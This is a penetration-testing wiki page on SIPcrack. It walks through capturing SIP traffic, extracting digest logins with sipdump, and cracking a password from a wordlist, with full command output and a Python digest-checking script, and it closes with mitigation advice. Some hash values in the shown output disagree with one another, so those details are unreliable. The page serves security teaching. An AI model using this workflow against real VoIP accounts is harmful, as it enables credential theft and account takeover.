kaliwiki/tools/sipcrack.md
2014-09-25 12:53:31 -04:00


# sipcrack
Notes
-------
SIPcrack is a suite for sniffing and cracking the digest authentication used in the SIP protocol.
The tools support pcap files, wordlists and more, extracting everything needed to bruteforce the passwords of the sniffed accounts.
SIPcrack contains 2 programs: sipdump, which captures the digest authentication, and sipcrack, which bruteforces the hash using a wordlist or standard input. sipdump dumps SIP digest authentications; if a login is found, the sniffed login is written to the dump file. See 'sipdump -h' for options.
sipcrack bruteforces the user's password with the dump file generated by sipdump; if a password is found, the sniffed and cracked login is updated in the dump file. See 'sipcrack -h' for options.
Help Text
-------
```
SIPcrack 0.2 ( MaJoMu | www.codito.de )
----------------------------------------
Usage: sipcrack [OPTIONS] [ -s | -w <wordlist> ] <dump file>
<dump file> = file containing logins sniffed by SIPdump
Options:
-s = use stdin for passwords
-w wordlist = file containing all passwords to try
-p num = print cracking process every n passwords (for -w)
(ATTENTION: slows down heavily)
* Either -w <wordlist> or -s has to be given
```
Example Usage
-------
Use sipdump to dump SIP digest authentications to a file. If a login is found, the sniffed login is written to the dump file.
Use sipcrack to bruteforce the user password using the dump file generated by sipdump. If a password is found, the sniffed login in the dump file is updated.
Example from [aldeid](http://www.aldeid.com/wiki/Crack-VoIP)
*Capturing the traffic*
Let's capture the traffic using tcpdump:
```
$ tcpdump -s0 -w sip.pcap tcp or udp
```
*Isolating the login*
sipdump is a tool shipped with SIPcrack. It extracts the SIP digest login from a traffic capture file.
```
$ cd ~/src/SIPcrack-0.3pre/
$ ./sipdump -p ~/tmp/sip.pcap logins.dump
SIPdump 0.3pre ( MaJoMu | www.codito.de )
---------------------------------------
* Using pcap file '../../tmp/sip.pcap' for sniffing
* Starting to sniff with packet filter 'tcp or udp'
* Dumped login from 212.27.52.5 -> 192.168.1.29 (User: '0950236158')
* Exiting, sniffed 1 logins
$ cat logins.dump
192.168.1.29"212.27.52.5"0950236158"freephonie.net"BYE"sip:172.17.20.241:5062"04cd38e646e760da129f99fa734ac1e4""""MD5"dc59445f8ef78a615a2ad4d57835a383
```
As you can see from the record above, the login (username, realm, nonce) appears in clear, and the password only as the MD5 digest response.
Notice that we could also have used tshark to obtain the same result:
```
$ tshark -r sip.pcap -Tfields -e sip.auth | grep username
Proxy-Authorization: Digest username=\"0950236158\",realm=\"freephonie.net\",
nonce=\"04cd38e646e760da129f99fa734ac1e4\",uri=\"sip:0950236158@freephonie.net\",
response=\"dc59445f8ef78a615a2ad4d57835a383\",algorithm=MD5,
opaque=\"04cc3f555880bdf\"\x0d\x0a
Proxy-Authorization: Digest username=\"0950236158\",realm=\"freephonie.net\",
nonce=\"04cd38e646e760da129f99fa734ac1e4\",uri=\"sip:172.17.20.241:5062\",
response=\"dc59995a8eb78f605a2ad5d57835a383\",algorithm=MD5,
opaque=\"04cd38e646e760\"\x0d\x0a
```
*Cracking the password*
sipcrack uses a dictionary to crack the password. For this example, we have built a wordlist that contains our password.
```
$ cat ~/exploits/dictionaries/test.txt
azerty
elephant
test
password
admin
password01
Password01
507ZEy@l
oops
oopsoops
cat
dog7
monster
$ ./sipcrack -w ~/exploits/dictionaries/test.txt logins.dump
SIPcrack 0.3pre ( MaJoMu | www.codito.de )
----------------------------------------
* Found Accounts:
Num Server Client User Hash|Password
1 192.168.1.29 212.27.52.5 0950236158 dc59495f8eb78a605a2ad5d57835a383
* Select which entry to crack (1 - 1): 1
* Generating static MD5 hash... 04cd38e646e760da129f99fa734ac1e4
* Starting bruteforce against user '0950236158' (MD5: 'dc59445f8ef78a615a2ad4d57835a383')
* Loaded wordlist: '~/exploits/dictionaries/test.txt'
* Starting bruteforce against user '0950236158' (MD5: 'dc59445f8ef78a615a2ad4d57835a383')
* Tried 10 passwords in 0 seconds
* Found password: '507ZEy@l'
* Updating dump file 'logins.dump'... done
```
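The following Python is an added example, not code from the SIPcrack project or the aldeid write-up. It shows what a sipdump record contains and why a single capture is enough to verify a password guess offline: the double-quote-separated fields map onto the RFC 2617 digest inputs, and the only term that depends on the password is HA1 = MD5(user:realm:password). The field order (server, client, user, realm, method, uri, nonce, cnonce, nc, qop, algorithm, response) is inferred from the record shown earlier on this page; the IP addresses, nonce and password in the constructed samples are made up, and the example also handles the qop=auth variant of the digest, which the page's record (empty qop) does not exercise.

```python
import hashlib

# Field order of one sipdump record; fields are separated by a double quote (").
# Inferred from the record shown on this page (assumption, not from the tool's source).
DUMP_FIELDS = ("server", "client", "user", "realm", "method", "uri",
               "nonce", "cnonce", "nc", "qop", "algorithm", "response")


def _md5(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def digest_response(user, realm, password, method, uri, nonce,
                    cnonce="", nc="", qop=""):
    """RFC 2617 MD5 digest as used by SIP.

    HA1 = MD5(user:realm:password)  -- the only half that depends on the password
    HA2 = MD5(method:uri)           -- depends only on the request
    Without qop: response = MD5(HA1:nonce:HA2)
    With qop:    response = MD5(HA1:nonce:nc:cnonce:qop:HA2)
    """
    ha1 = _md5(f"{user}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    if qop:
        return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return _md5(f"{ha1}:{nonce}:{ha2}")


def parse_dump_line(line):
    """Split one sipdump record into a dict keyed by DUMP_FIELDS."""
    parts = line.strip().split('"')
    if len(parts) != len(DUMP_FIELDS):
        raise ValueError(f"expected {len(DUMP_FIELDS)} fields, got {len(parts)}")
    return dict(zip(DUMP_FIELDS, parts))


def check_password(entry, candidate):
    """True if `candidate` reproduces the response recorded in a parsed dump entry."""
    if entry["algorithm"].upper() != "MD5":
        raise ValueError(f"unsupported algorithm {entry['algorithm']!r}")
    expected = digest_response(entry["user"], entry["realm"], candidate,
                               entry["method"], entry["uri"], entry["nonce"],
                               entry["cnonce"], entry["nc"], entry["qop"])
    return expected == entry["response"].lower()


def make_dump_line(server, client, user, realm, password, method, uri, nonce,
                   cnonce="", nc="", qop=""):
    """Build a sipdump-format record from known credentials. Used here only to
    construct sample data whose response is known to be correct."""
    response = digest_response(user, realm, password, method, uri, nonce,
                               cnonce, nc, qop)
    return '"'.join([server, client, user, realm, method, uri,
                     nonce, cnonce, nc, qop, "MD5", response])


# Constructed samples: documentation IP range, made-up nonce and password.
SAMPLE_NOQOP = make_dump_line("192.0.2.10", "192.0.2.20", "alice", "example.net",
                              "correct-horse", "REGISTER", "sip:example.net",
                              "0123456789abcdef0123456789abcdef")
SAMPLE_QOP = make_dump_line("192.0.2.10", "192.0.2.20", "alice", "example.net",
                            "correct-horse", "INVITE", "sip:bob@example.net",
                            "0123456789abcdef0123456789abcdef",
                            cnonce="deadbeef", nc="00000001", qop="auth")

# The record shown earlier on this page, re-joined onto one line.
PAGE_LINE = ('192.168.1.29"212.27.52.5"0950236158"freephonie.net"BYE"sip:172.17.20.241:5062"'
             '04cd38e646e760da129f99fa734ac1e4""""MD5"dc59445f8ef78a615a2ad4d57835a383')


if __name__ == "__main__":
    for line in (SAMPLE_NOQOP, SAMPLE_QOP):
        e = parse_dump_line(line)
        print(e["user"], e["method"], "qop=" + (e["qop"] or "<none>"),
              "matches:", check_password(e, "correct-horse"),
              "wrong guess:", check_password(e, "wrong"))
    print("page record user:", parse_dump_line(PAGE_LINE)["user"])
```

Because everything except the password is recorded in clear, any observer of unencrypted SIP signalling can test guesses at will; the practical mitigations are carrying SIP over TLS (SIPS) so the digest headers are never exposed, and long random per-device passwords so that a wordlist like the one above does not contain them.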
Links
-------
* [cracking VOIP](http://www.aldeid.com/wiki/Crack-VoIP)